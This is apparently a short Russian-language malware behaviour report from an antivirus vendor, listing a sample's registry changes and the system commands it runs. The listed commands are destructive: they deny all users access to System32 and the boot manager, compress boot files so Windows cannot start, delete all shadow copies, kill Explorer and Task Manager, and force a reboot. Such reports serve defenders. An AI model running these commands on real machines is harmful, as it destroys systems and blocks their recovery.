Техническая информация
- [<HKLM>\SOFTWARE\Classes\.com] '' = 'com'
- [<HKLM>\SOFTWARE\Classes\.exe] '' = 'exe'
- <SYSTEM32>\attrib.exe -s -h -r C:\bootmgr
- <SYSTEM32>\cacls.exe "%PROGRAM_FILES%\Internet Explorer\iexplore.exe" /e /c /d Everyone
- <SYSTEM32>\taskkill.exe /f /im iexplore.exe
- <SYSTEM32>\cacls.exe <SYSTEM32> /t /e /c /d Everyone
- <SYSTEM32>\shutdown.exe -r -t 10
- <SYSTEM32>\cacls.exe C:\bootmgr /e /c /d Everyone
- <SYSTEM32>\makecab.exe C:\NTDETECT.COM C:\NTDETECT.COM
- <SYSTEM32>\makecab.exe C:\ntldr C:\ntldr
- <SYSTEM32>\vssadmin.exe delete Shadows /All /Quiet
- <SYSTEM32>\taskkill.exe /f /im taskmgr.exe
- <SYSTEM32>\taskkill.exe /f /im explorer.exe
- <SYSTEM32>\makecab.exe C:\boot.ini C:\boot.ini
- %WINDIR%\Explorer.EXE
- iexplore.exe
- C:\bootmgr
- ClassName: '' WindowName: ''